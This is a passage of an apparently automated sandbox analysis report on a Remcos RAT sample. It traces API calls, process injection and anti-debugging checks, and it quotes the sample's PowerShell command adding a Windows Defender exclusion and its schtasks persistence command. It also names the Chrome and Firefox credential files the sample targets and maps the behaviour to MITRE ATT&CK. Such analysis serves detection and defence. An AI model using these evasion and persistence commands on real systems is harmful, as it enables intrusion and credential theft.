          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808Thread sleep count: 509 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808Thread sleep time: -1527000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808Thread sleep count: 9485 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808Thread sleep time: -28455000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe TID: 5908Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041A01B
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040B28E
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040838E
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004087A0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00407848
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004068CD FindFirstFileW,FindNextFileW,14_2_004068CD
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0044BA59 FindFirstFileExA,14_2_0044BA59
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040AA71
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00417AAB
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040AC78
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00406D28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554426544.0000000000D36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004327AE
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004407B5 mov eax, dword ptr fs:[00000030h]14_2_004407B5
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00410763
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004327AE
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004328FC SetUnhandledExceptionFilter,14_2_004328FC
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_004398AC
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00432D5C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeMemory written: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe14_2_00410B5C
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004175E1 mouse_event,14_2_004175E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"Jump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerB
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554426544.0000000000D29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004329DA cpuid 14_2_004329DA
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: EnumSystemLocalesW,14_2_0044F17B
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: EnumSystemLocalesW,14_2_0044F130
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: EnumSystemLocalesW,14_2_0044F216
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_0044F2A3
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetLocaleInfoA,14_2_0040E2BB
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetLocaleInfoW,14_2_0044F4F3
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_0044F61C
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetLocaleInfoW,14_2_0044F723
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_0044F7F0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: EnumSystemLocalesW,14_2_00445914
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: GetLocaleInfoW,14_2_00445E1C
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,14_2_0044EEB8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeQueries volume information: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040A0B0 GetLocalTime,wsprintfW,14_2_0040A0B0
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004195F8 GetUserNameW,14_2_004195F8
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_004466BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040A953
          Contains functionality to steal Firefox passwords or cookies
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040AA71
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: \key3.db14_2_0040AA71

          Remote Access Functionality

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: cmd.exe14_2_0040567A

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services11
          Archive Collected Data          		12
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		1
          Windows Service          		1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		111
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol111
          Input Capture          		2
          Encrypted Channel          		Exfiltration Over Bluetooth1
          Defacement
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job          		1
          Scheduled Task/Job          		1
          Windows Service          		4
          Obfuscated Files or Information          		2
          Credentials In Files          		1
          System Service Discovery          		SMB/Windows Admin Shares3
          Clipboard Data          		2
